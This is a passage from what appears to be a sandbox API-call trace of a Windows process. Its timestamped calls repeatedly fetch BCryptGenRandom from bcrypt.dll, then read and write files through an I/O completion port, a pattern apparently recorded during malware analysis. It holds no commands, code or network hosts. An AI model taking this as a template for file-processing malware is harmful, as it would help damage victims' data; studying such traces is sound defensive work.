lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0166.538] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0166.546] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0166.547] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0166.547] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x30efc30) returned 0x0 [0166.547] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0166.547] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0166.547] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x30ef970) returned 0x0 [0166.547] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0166.547] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0166.547] free (_Block=0x3e305b8) [0166.547] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0166.547] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0166.548] free (_Block=0x1fa91d0) [0166.548] free (_Block=0x1fa2ed8) [0166.548] free (_Block=0x1fa90b8) [0166.548] WriteFile (in: hFile=0x2a8, lpBuffer=0x1ff1e94, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0166.548] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0166.554] CloseHandle (hObject=0x2a4) returned 1 [0166.554] free (_Block=0x3df0008) [0166.554] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0166.560] ReadFile (in: hFile=0x308, lpBuffer=0x3e7003c, nNumberOfBytesToRead=0x1ae6, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008) returned 1 [0166.569] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0166.576] ReadFile (in: hFile=0x2a4, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x1928, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0166.581] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0166.600] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0166.600] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0166.600] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x30efc30) returned 0x0 [0166.600] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0166.601] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0166.601] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x30ef970) returned 0x0 [0166.601] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0166.601] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0166.601] free (_Block=0x3e305b8) [0166.601] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0166.601] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0166.602] free (_Block=0x1fa91d0) [0166.602] free (_Block=0x1fa2ed8) [0166.602] free (_Block=0x1fa90b8) [0166.602] WriteFile (in: hFile=0x2a8, lpBuffer=0x1ff1e94, nNumberOfBytesToWrite=0x614, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0166.602] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0166.613] WriteFile (in: hFile=0x170, lpBuffer=0x3d70484, nNumberOfBytesToWrite=0x4cf0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 0x0 [0166.614] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0166.617] ReadFile (in: hFile=0x308, lpBuffer=0x3f7007c, nNumberOfBytesToRead=0x6028, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048) returned 1 [0166.618] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0167.349] WriteFile (in: hFile=0x3cc, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x990, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0167.350] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0167.360] WriteFile (in: hFile=0x308, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x5a0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0167.360] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0167.374] ReadFile (in: hFile=0x2a8, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x3f9c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 1 [0167.386] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0167.396] ReadFile (in: hFile=0x170, lpBuffer=0x3f7007c, nNumberOfBytesToRead=0xdda, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048) returned 1 [0167.396] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0167.447] CloseHandle (hObject=0x2a8) returned 1 [0167.447] free (_Block=0x3d70450) [0167.447] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0167.455] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0167.455] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0167.456] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x30efc30) returned 0x0 [0167.456] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0167.456] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0167.456] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x30ef970) returned 0x0 [0167.457] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0167.457] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0167.457] free (_Block=0x3e305b8) [0167.457] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0167.457] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0167.457] free (_Block=0x1fa91d0) [0167.457] free (_Block=0x1fa2ed8) [0167.457] free (_Block=0x1fa90b8) [0167.457] WriteFile (in: hFile=0x3cc, lpBuffer=0x3f7007c*, nNumberOfBytesToWrite=0x61e, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048) returned 1 [0167.458] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0167.459] CloseHandle (hObject=0x2a4) returned 1 [0167.459] free (_Block=0x3e70008) [0167.459] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0167.460] CloseHandle (hObject=0x170) returned 1 [0167.460] free (_Block=0x3df0008) [0167.460] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0167.460] CloseHandle (hObject=0x3cc) returned 1 [0167.461] free (_Block=0x3f70048) [0167.461] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0167.476] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0167.480] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0167.480] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x30efc30) returned 0x0 [0167.480] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0167.481] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0167.481] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x30ef970) returned 0x0 [0167.481] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0167.481] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0167.481] free (_Block=0x3e305b8) [0167.481] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0167.481] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0167.482] free (_Block=0x1fa91d0) [0167.482] free (_Block=0x1fa2ed8) [0167.482] free (_Block=0x1fa90b8) [0167.482] WriteFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 0x0 [0167.482] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0167.489] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0167.490] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0167.490] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x30efc30) returned 0x0 [0167.490] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0167.491] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0167.491] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x30ef970) returned 0x0 [0167.491] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0167.491] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0167.491] free (_Block=0x3e305b8) [0167.491] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0167.491] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0167.492] free (_Block=0x1fa91d0) [0167.492] free (_Block=0x1fa2ed8) [0167.492] free (_Block=0x1fa90b8) [0167.492] WriteFile (in: hFile=0x170, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x61a, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0167.492] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0167.497] WriteFile (in: hFile=0x3cc, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x78e0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0167.497] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0167.509] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0167.509] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0167.509] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x30efc30) returned 0x0 [0167.509] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0167.510] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0167.510] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x30ef970) returned 0x0 [0167.510] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0167.510] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0167.510] free (_Block=0x3e305b8) [0167.510] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0167.510] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0167.511] free (_Block=0x1fa91d0) [0167.511] free (_Block=0x1fa2ed8) [0167.511] free (_Block=0x1fa90b8) [0167.511] WriteFile (in: hFile=0x2a4, lpBuffer=0x3d70484, nNumberOfBytesToWrite=0x61c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 0x0 [0167.511] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0167.523] CloseHandle (hObject=0x170) returned 1 [0167.523] free (_Block=0x1ff1e60) [0167.523] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0167.536] ReadFile (in: hFile=0x2a8, lpBuffer=0x3f7007c, nNumberOfBytesToRead=0x6928, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048) returned 0x0 [0167.547] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0167.576] CloseHandle (hObject=0x170) returned 1 [0167.578] free (_Block=0x1ff1e60) [0167.578] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0167.613] ReadFile (in: hFile=0x2a4, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x5850, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0167.615] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0167.615] CloseHandle (hObject=0x2a4) returned 1 [0167.615] free (_Block=0x3df0008) [0167.615] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0167.616] CloseHandle (hObject=0x308) returned 1 [0167.616] free (_Block=0x3e70008) [0167.616] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0167.618] ReadFile (in: hFile=0x170, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x5328, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0167.620] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0167.633] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x8c0, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0167.633] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0167.633] CloseHandle (hObject=0x170) returned 1 [0167.633] free (_Block=0x3df0008) [0167.633] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0167.643] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0167.643] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0167.643] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x30efc30) returned 0x0 [0167.643] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0167.644] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0167.644] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x30ef970) returned 0x0 [0167.644] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0167.644] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0167.644] free (_Block=0x3e305b8) [0167.644] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0167.644] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0167.645] free (_Block=0x1fa91d0) [0167.645] free (_Block=0x1fa2ed8) [0167.645] free (_Block=0x1fa90b8) [0167.645] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x618, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0167.645] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0167.646] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x3a00, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0167.646] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0167.658] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x1d2a, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0167.660] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0167.673] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0xc70, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0167.673] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0167.673] CloseHandle (hObject=0x170) returned 1 [0167.673] free (_Block=0x3df0008) [0167.673] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0167.682] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0167.682] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0167.683] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x30efc30) returned 0x0 [0167.683] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0167.683] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0167.683] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x30ef970) returned 0x0 [0167.683] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0167.683] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0167.683] free (_Block=0x3e305b8) [0167.683] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0167.684] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0167.684] free (_Block=0x1fa91d0) [0167.684] free (_Block=0x1fa2ed8) [0167.684] free (_Block=0x1fa90b8) [0167.684] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x61c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0167.684] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0167.684] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x620, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: 